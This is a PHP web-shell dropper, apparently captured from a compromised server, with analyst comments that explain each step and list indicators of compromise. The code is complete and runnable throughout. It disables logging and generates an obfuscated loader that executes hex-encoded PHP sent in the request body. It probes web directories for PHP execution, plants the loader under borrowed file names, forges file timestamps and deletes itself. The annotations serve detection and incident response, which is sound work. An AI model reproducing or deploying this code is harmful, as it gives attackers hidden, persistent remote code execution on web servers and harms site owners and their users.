Current File : //tmp/20250826-094834-aK2C8mi6MXr5C2Voarg7kAAAAAQ-file-gKlqPI |
<?php
// Analyst note: the calls below switch off PHP error logging, error display and error
// reporting, so the run leaves no warnings in the PHP error log. The '@' prefix also hides
// any failure of the calls themselves.
@ini_set('error_log', NULL);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
// Lift the execution time limit so the directory walk and HTTP probes are not cut short.
@set_time_limit(0);
@ini_set('max_execution_time', 0);
@ini_set('magic_quotes_runtime', 0);
@date_default_timezone_set('UTC');
// Fixed marker emitted at the start of every response, before any work is done. The literal
// body prefix <status>__spam____check__</status> is a usable indicator in response captures.
echo '<status>';
echo('__spam__');
echo('__check__');
echo '</status>';
// load
// Returns the first 1-9 characters of a shuffled 'a'-'z' plus '_' alphabet. varReplace() uses
// the result as a replacement variable name. The alphabet is repeated only once, so no
// character occurs twice in a name. rand() is not a cryptographic source.
function randomName(){ return substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz_', 1)), 0, rand(1, 9)); }
// Case-randomising helper used by the generator functions in this file.
// - array input: each element is passed through c() recursively; the by-reference foreach
//   rewrites the local copy, which is what gets returned;
// - string input: each byte is independently lower- or upper-cased at random;
// - any other type is returned unchanged.
// Consequence for detection: letter case in the generated file differs on every run, so
// signatures for its keywords and function names must be matched case-insensitively.
function c($o)
{
if(is_array($o))
foreach($o as $k => &$v) $v = c($v);
if(is_string($o))
$o = implode('', array_map(function($s){return rand(0, 1) ? strtolower($s) : strtoupper($s);}, str_split($o)));
return $o;
}
// Produces one random filler fragment: a PHP comment, or a tab/space followed by another
// fragment. t() appends such a fragment after every token of the generated file, which is
// why the planted file looks like code interleaved with meaningless comments.
function j()
{
// The loop below stops once index $l exists, i.e. once $c holds $l + 1 characters.
$l = rand(10, 50);
// $c starts undefined; '@' hides the notice on the first append. Bytes are printable ASCII (32-126).
while(!isset($c[$l])) @$c .= chr(rand(32, 126));
if(rand(0, 1))
// Single-line comment: '#' plus one byte from 32-90, or '//', then the filler and a CR or LF.
// preg_replace strips any PHP closing-tag sequence, which would otherwise end the comment.
return preg_replace("|\?>|", "", ((rand(0, 1) ? "#".chr(rand(32, 90)) : "//").$c.(rand(0, 1) ? "\r" : "\n")));
else
// Block comment with any block-comment terminator removed from the filler, or a tab/space
// followed by a recursively generated fragment.
return (rand(0, 1) ? "/*".preg_replace("|\*/|","", $c)."*/" : (rand(0, 1) ? "\t".j() : " ".j()));
}
// Variadic chooser: picks one of its arguments uniformly at random and returns it after
// case-randomisation by c(). The generator uses it to select between alternative code
// snippets, so two generated files rarely share the same text.
function r()
{
$r = func_get_args();
return c($r[rand(0, (func_num_args() - 1))]);
}
// Re-emits the PHP source in $s token by token, appending a j() filler fragment after each
// token. token_get_all() yields arrays (token text at index 1) for named tokens and plain
// strings for single-character tokens; both are handled. '@' hides the notice from appending
// to the initially undefined $r.
// Consequence for detection: multi-token sequences are never contiguous in the output, but
// the text of each individual token (for example a quoted string literal) stays intact.
function t($s)
{
foreach(token_get_all($s) as $t)
@$r .= (is_array($t) ? $t[1] : $t).j();
return $r;
}
// Final pass over the generated source.
// 1. Every variable name listed in $vars is replaced, case-insensitively, by a fresh random
//    name from randomName() with randomised case.
// 2. The str_ireplace() calls whose search and replacement are identical restore exact case
//    for text that c() case-randomised but that must keep its spelling to work: $_SERVER,
//    the HTTP_ENCODING_CONTENT key, 'error', and the "uri" and "H*" string literals.
// Consequence for detection: those restored literals are the stable, case-exact strings in
// every generated file, unlike the variable names and keyword case.
function varReplace($code, $vars)
{
foreach($vars as $var)
{
$new_var = c(randomName());
$code = str_ireplace('$'.$var, '$'.$new_var, $code);
}
$code = str_ireplace('$_SERVER', '$_SERVER', $code);
$code = str_ireplace('HTTP_ENCODING_CONTENT', 'HTTP_ENCODING_CONTENT', $code);
$code = str_ireplace('error', 'error', $code);
$code = str_ireplace('"uri"', '"uri"', $code);
$code = str_ireplace('"H*"', '"H*"', $code);
return $code;
}
// Variable names used inside the template built by scriptGenerator(); varReplace() swaps
// each of them for a random name.
$vars = array('content', 'file_var', 'tmpfile', 'meta', 'pos');
// Builds the source text of the file that this script plants on disk. When the planted file
// is later requested over HTTP, the generated code:
//   1. reads the request body from php://input, using one of four alternative snippets
//      chosen at random;
//   2. splits the body once on "=" into at most two parts;
//   3. selects part 0 when $_SERVER["HTTP_ENCODING_CONTENT"] equals 2, otherwise part 1
//      (PHP normally fills that key from an Encoding-Content request header);
//   4. hex-decodes the selected part with pack("H*"), writes it to a tmpfile() and runs it
//      through include/require (optionally the _once form);
//   5. exits with "error" when the body is empty.
// In short, the planted file executes PHP code delivered in the request body.
// Detection and response notes: look for requests carrying an Encoding-Content header and a
// long hex body, and for .php files that combine php://input, tmpfile(), pack() and an
// include/require of a stream "uri". Treat any host where such a file is found as compromised.
function scriptGenerator()
{
// Opening tag with randomised case, then 2-5 distinct entries from a small whitespace set,
// then either a filler fragment from j() or nothing.
$code = '<?'.c('php').implode('', array_rand(array_flip(["\n","\r","\t"," ", "", chr(9)]), rand(2, 5))).r(j(), '');
// One of four ways to read the request body. The fgets() and file()[0] variants read only
// the first line of the body.
$code .= r('$content = file_get_contents("php://input")',
'$file_var = fopen("php://input", "r"); $content = fgets($file_var); fclose($file_var)',
'$file_var = fopen("php://input", "r"); $content = stream_get_contents($file_var); fclose($file_var)',
'$file_var = file("php://input"); $content = $file_var[0]');
// The rest of the template is a single string literal interrupted only by r() calls that
// pick the write function (fwrite or file_put_contents) and the include/require keyword.
$code .= ';
if(!empty($content) && $content = explode("=", $content, 2))
{
$tmpfile = tmpfile();
$meta = stream_get_meta_data($tmpfile);
$pos = @$_SERVER["HTTP_ENCODING_CONTENT"];
$pos = ($pos && $pos == 2) ? 0 : 1;
'.r('fwrite($tmpfile', 'file_put_contents($meta["uri"]').', pack("H*", $content[$pos]));
'.r('include', 'require').r('_once', '').'($meta["uri"]);
}
else die("error");';
return $code;
}
// Generation pipeline: build the template, randomise its letter case, interleave filler
// comments between tokens, then rename variables and restore the case-exact literals.
// $body is the text that gets written to disk further down.
$script_obf = t(c(scriptGenerator()));
$body = varReplace($script_obf, $vars);
$homedir=@$_SERVER['DOCUMENT_ROOT'];
// Determine the host
// The scheme is taken from $_SERVER['HTTPS'] and the host name from the request's Host
// header, so the base URL used for the self-test request comes from request data.
if(isset($_SERVER['HTTPS'])) $scheme = $_SERVER['HTTPS'];
else $scheme = '';
if($scheme && $scheme != '' && $scheme != 'off') $host = 'https://'.$_SERVER['HTTP_HOST'];
else $host = 'http://'.$_SERVER['HTTP_HOST'];
$homedir = @$_SERVER['DOCUMENT_ROOT'];
// Placement strategy 1 ("First"): look below the document root for a directory that is
// writable and confirmed to execute PHP over HTTP, then write $body there under a file name
// borrowed from an existing .php file found by scan().
// Indicators left by this strategy: a short-lived 't_s_<name>.php' probe file, a request
// from the server to its own URL for that probe, and a new .php file whose mtime is older
// than its real creation time.
if($handle = opendir($homedir)) // First
{
// Collect the first-level sub-directories of the document root.
while (false !== ($file = readdir($handle)))
{
if($file == "." or $file == "..") continue;
if(filetype($homedir.DIRECTORY_SEPARATOR.$file) == "dir") $root_dirs[$file]=$homedir.DIRECTORY_SEPARATOR.$file;
}
// shuffle() randomises the order and re-indexes numerically, so $root_name is an integer.
shuffle($root_dirs);
foreach($root_dirs as $root_name => $root_dir)
$result[$root_name] = scan($root_dir);
if(count($result) > 0)
foreach($result as $info)
{
// Skip trees where scan() found no directory or no candidate .php file name.
if(!isset($info['dir']) || count(@$info['dir']) == 0) continue;
if(!isset($info['file']) || count(@$info['file']) == 0) continue;
$info['dir'] = array_unique($info['dir']);
shuffle($info['dir']);
$info['file'] = array_unique($info['file']);
shuffle($info['file']);
foreach($info['dir'] as $random_dir)
{
foreach($info['file'] as $random_file)
{
// $try_random is not assigned anywhere in the visible source, so as shown this branch
// (replace the .php extension with a backup-style suffix plus .php) is not taken.
if(count($info['dir']) == 1 && $try_random == '1')
{
$suffix = array('_', '.old', '_old', 'old', 'bak', '.bak', '_bak', '1', '2', '3', '_1', '_2', '_3', '.1', '.2', '.3');
shuffle($suffix);
$replace = $suffix[0].'.php';
$random_file = preg_replace('/\.php$/i', $replace, $random_file);
}
// The probe file carries a 't_s_' prefix; the final file name drops it.
$random_path = $random_dir.DIRECTORY_SEPARATOR.'t_s_'.$random_file;
// Only names that do not yet exist in this directory are used, so no existing file is
// overwritten and nothing on the site visibly breaks.
if(!is_file($random_dir.DIRECTORY_SEPARATOR.$random_file))
{
if(is_writable($random_dir))
{
// Record the directory mtime and find the oldest mtime among its entries; both values are
// used below to set timestamps.
$dir_time = filemtime($random_dir);
if($handle = opendir($random_dir))
{
$old_time = microtime(1);
while (false !== ($file = readdir($handle)))
{
if($file == "." or $file == "..") continue;
$filemt = filemtime($random_dir.DIRECTORY_SEPARATOR.$file);
if($filemt < $old_time) $old_time = $filemt;
}
$old_time = ($dir_time < $old_time) ? $dir_time : $old_time;
// Probe: write a one-line PHP file that prints md5(23), request it through get(), and check
// that the hash appears in the response. A match means PHP executes in this directory.
$test_str = '<?php echo md5(23); ?>';
if(file_put_contents($random_path, $test_str))
{
$url = $host.str_replace('\\','/',str_replace($homedir,'',$random_path));
if($content = get($url))
{
if(preg_match('/'.md5(23).'/', $content))
{
// Confirmed: remove the probe and write the generated loader under the unprefixed name.
unlink($random_path);
$random_path = str_replace('t_s_', '', $random_path);
if(file_put_contents($random_path, $body))
{
chmod($random_path, 0755);
// Timestamp forgery: the new file receives the oldest mtime seen in the directory and the
// directory mtime is put back. touch() sets only access and modification times, so the
// inode change time (ctime) and file-integrity baselines still expose the new file.
touch($random_path, $old_time);
touch($random_dir, $dir_time);
// Report the URL of the planted file. endik() also deletes this script and exits.
endik(str_replace('/t_s_', '/', $url));
}
else endik('re_error_write');
}
}
// Reached only when the probe was not confirmed (both confirmed paths exit in endik()):
// remove the probe file and restore the directory mtime.
if(file_exists($random_path))
{
unlink($random_path);
touch($random_dir, $dir_time);
}
}
}
}
// After the first name that does not already exist, stop trying names in this directory
// and continue with the next directory.
break(1);
}
}
}
}
}
// Placement strategy 2 ("Second"), reached only when strategy 1 did not exit through
// endik(): write $body as 'input.php' in the directory of the currently executing script.
// Indicators: an 'input.php' next to the entry script with an mtime matching a directory
// mtime, and the result strings 're_error_write' / 're_error_right' in response bodies.
if(is_writable(dirname($_SERVER['SCRIPT_FILENAME']))) // Second
{
// Use the older of the mtimes of "./" and "../" (relative to the working directory) as the
// forged timestamp. As above, ctime is not affected by touch().
$old_time = (filemtime("./") < filemtime("../")) ? filemtime("./") : filemtime("../");
$file = dirname($_SERVER['SCRIPT_FILENAME']).'/input.php';
if(file_put_contents($file, $body))
{
touch($file, $old_time);
$url_path = str_replace('//', '/', dirname($_SERVER['PHP_SELF']).'/input.php');
endik($host.$url_path);
}
else endik('re_error_write');
}
else endik('re_error_right');
// Recursive directory walk used to pick candidate locations and file names.
// Parameters: $homedir is the directory to read, $count the current recursion depth,
// $files the accumulator carried through the recursion.
// Returns an array with up to two keys:
//   'dir'  - full paths of every directory visited or seen (duplicates are possible, the
//            caller applies array_unique());
//   'file' - bare file names (not paths) ending in .php, excluding names that contain
//            index.php or admin.php.
// Recursion stops once $count exceeds $scan_max, so depths 0, 1 and 2 are read.
// Because only bare names are collected, a name found in one directory can later be used in
// a different directory of the same tree.
function scan($homedir, $count=0, $files=array())
{
$scan_max = 2;
$subdir = array();
if($count > $scan_max) return $files;
if($handle = opendir($homedir))
{
$files['dir'][] = $homedir;
while(false !== ($file = readdir($handle)))
{
if($file == "." or $file == "..") continue;
$fullPath = $homedir.DIRECTORY_SEPARATOR.$file;
if(filetype($fullPath) == "dir")
{
$files['dir'][] = $fullPath;
$subdir[] = $fullPath;
}
elseif(!preg_match('#(index\.php|admin\.php)#', $file) and preg_match('/\.php$/i', $file)) $files['file'][] = $file;
}
++$count;
if(count($subdir) > 0)
foreach($subdir as $dir) $files = scan($dir, $count, $files);
}
return $files;
}
// Fetches $url with an HTTP GET and returns the response text, or false when no transport
// is available or the socket cannot be opened. Transports are tried in this order:
// cURL, file_get_contents() (only when allow_url_fopen is on), raw fsockopen().
// The caller uses it to request the probe file from the server's own host name.
// Indicators: all three transports send the same fixed Firefox 38 User-Agent string, so a
// request from the server's own address with that User-Agent for a 't_s_' prefixed .php
// file stands out in access logs.
function get($url)
{
if(is_callable("curl_exec"))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS certificate and host name verification are switched off, so the request succeeds
// against self-signed or mismatched certificates.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$content = curl_exec($ch);
curl_close($ch);
return $content;
}
elseif(is_callable("file_get_contents") && filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN))
{
// Same request through the stream wrapper, again with peer verification disabled.
return file_get_contents($url, false, stream_context_create(array(
"ssl" => array("verify_host" => false,
"verify_peer" => false,
"verify_peer_name" => false,
"allow_self_signed" => true
),
"http" => array(
"header" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0"
)
)));
}
elseif(is_callable("fsockopen"))
{
// Raw socket fallback: always connects to port 80 regardless of the URL scheme, with a
// 15 second connect timeout. The returned text includes the response headers.
if($fp = fsockopen(parse_url($url, PHP_URL_HOST), 80, $e, $e, 15))
{
$out ="GET ".parse_url($url, PHP_URL_PATH)." HTTP/1.1\r\n";
$out.="Host: ".parse_url($url, PHP_URL_HOST)."\r\n";
$out.="User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0\r\n";
$out.="\r\n";
fputs($fp, $out);
$content = '';
while(!feof($fp)) {
$content .= fgets($fp, 1024);
}
fclose($fp);
return $content;
}
else return false;
}
else return false;
}
// Reads lines from $socket and concatenates them until a line whose fourth character is a
// space, which is how the last line of a multi-line SMTP-style reply is marked (the local
// variable name $smtp_msg points the same way). Returns the accumulated text.
// This function is not called anywhere in the visible source.
function get_data($socket) {
$smtp_msg = '';
while ($line = fgets($socket, 515)) {
$smtp_msg .= $line;
if(substr($line, 3, 1) == " ") break;
}
return ($smtp_msg);
}
// Terminates the run: deletes this script from disk, prints $msg wrapped in <result> tags
// and exits. $msg is either the URL of the planted file or one of the 're_error_*' strings.
// Consequence for incident response: the installer is normally gone from disk after one
// run, so evidence has to come from web server access logs, upload captures, and the
// planted file itself. The <result> wrapper is a usable indicator in response captures.
function endik($msg) {
@unlink(__FILE__);
$result = '<result>'.$msg.'</result>';
die($result);
}
?>